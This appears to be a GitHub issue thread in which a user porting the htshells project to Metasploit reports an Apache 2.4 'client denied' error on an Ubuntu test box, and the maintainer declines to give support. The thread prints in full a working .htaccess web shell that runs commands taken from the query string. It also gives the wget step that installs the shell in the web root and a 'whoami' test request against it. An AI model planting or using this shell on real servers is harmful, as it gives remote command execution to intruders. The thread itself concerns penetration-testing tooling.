Closed h00die closed 2 years ago
htshells should work on Apache2. Did you uncomment the line per the comments in the file?
To set this up:
apt-get update
and apt-get dist-upgrade
apt-get install apache2
a2enmod cgi
apache2ctl restart
confirm we're in working order:
ubuntu@ubuntu2004:~$ curl --silent 127.0.0.1 | head
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<!--
Modified from the Debian original for Ubuntu
Last updated: 2016-11-16
See: https://launchpad.net/bugs/1288690
-->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
wget -O /var/www/html/.htaccess https://raw.githubusercontent.com/wireghoul/htshells/master/sh ell/mod_cgi.shell.bash.htaccess
chmod +x /var/www/html/.htaccess
sed -i 's/# Require all granted/ Require all granted/' /var/www/html/.htaccess
Double check we're all good:
ubuntu@ubuntu2004:~$ cat /var/www/html/.htaccess
#!/bin/sh
# Self contained .htaccess web shell - Part of the htshell project
# Written by Wireghoul - http://www.justanotherhacker.com
# IMPORTANT: Needs chmod +x to run
# Run commands via http://url/.htaccess?cmd (ie: http://url/.htaccess?uname -a)
# Big shout out to the rosetta code website which provided the example below!
# This is considered a line spanning comment in apache and not by shell #winning \
echo -en "Content-Type: text/plain\r\n\r\n";cmd=$(echo $QUERY_STRING | sed -e's/+/ /g' -e's/%20/ /g');echo "\$ $cmd";$cmd 2>&1;exit
# The exit ensures we never reach the following lines which would break the shell parser
# Override default deny rule to make .htaccess file accessible over web
<Files ~ "^\.ht">
# Uncomment the line below for Apache2.4 and newer
Require all granted
Order allow,deny
Allow from all
</Files>
# Enable CGI
Options +ExecCGI
#Make apache treat .htaccess as a cgi file
AddHandler cgi-script .htaccess
apache2ctl restart
(just to be certain everything is correct)curl --silent "http://127.0.0.1/.htaccess?whoami" | head
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access this resource.</p>
<hr>
<address>Apache/2.4.41 (Ubuntu) Server at 127.0.0.1 Port 80</address>
</body></html>
ubuntu@ubuntu2004:~$ tail -n 1 /var/log/apache2/error.log
[Sat Jan 08 15:24:06.423878 2022] [authz_core:error] [pid 3034:tid 139833246701312] [client 127.0.0.1:46224] AH01630: client denied by server configuration: /var/www/html/.htaccess
All changes to server are listed here. However, for sake of consistency, here's the only enabled site config:
<VirtualHost *:80>
# The ServerName directive sets the request scheme, hostname and port that
# the server uses to identify itself. This is used when creating
# redirection URLs. In the context of virtual hosts, the ServerName
# specifies what hostname must appear in the request's Host: header to
# match this virtual host. For the default virtual host (this file) this
# value is not decisive as it is used as a last resort host regardless.
# However, you must set it for any further virtual host explicitly.
#ServerName www.example.com
ServerAdmin webmaster@localhost
DocumentRoot /var/www/html
# Available loglevels: trace8, ..., trace1, debug, info, notice, warn,
# error, crit, alert, emerg.
# It is also possible to configure the loglevel for particular
# modules, e.g.
#LogLevel info ssl:warn
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
# For most configuration files from conf-available/, which are
# enabled or disabled at a global level, it is possible to
# include a line for only one particular virtual host. For example the
# following line enables the CGI configuration for this host only
# after it has been globally disabled with "a2disconf".
#Include conf-available/serve-cgi-bin.conf
</VirtualHost>
# vim: syntax=apache ts=4 sw=4 sts=4 sr noet
Thus, it seems the default config is blocking this in some way shape or form. I spent some time trying to debug, but didn't make any progress.
any updates?
Sorry, there is no unpaid tech support for this project. Between this talk (https://youtu.be/p1aCTBZrIOw) the Apache documentation and your server logs you should be able to figure it out.
In most real world scenarios I've seen you usually only get one shot at generating the correct htaccess file for the server config in use. Or you can write a specific exploit for a known configuration. Tbh I'd rather not see htshells as a payload function in metasploit, as I fear that will just generate a large number of support requests from users who had their exploit fail and use GitHub to demand answers.
I'm looking to port this to metasploit, however on an ubuntu 20.04 apache 2.4.41 box with https://github.com/wireghoul/htshells/blob/master/shell/mod_cgi.shell.bash.htaccess I'm getting
AH01630: client denied by server configuration: /var/www/html/.htaccess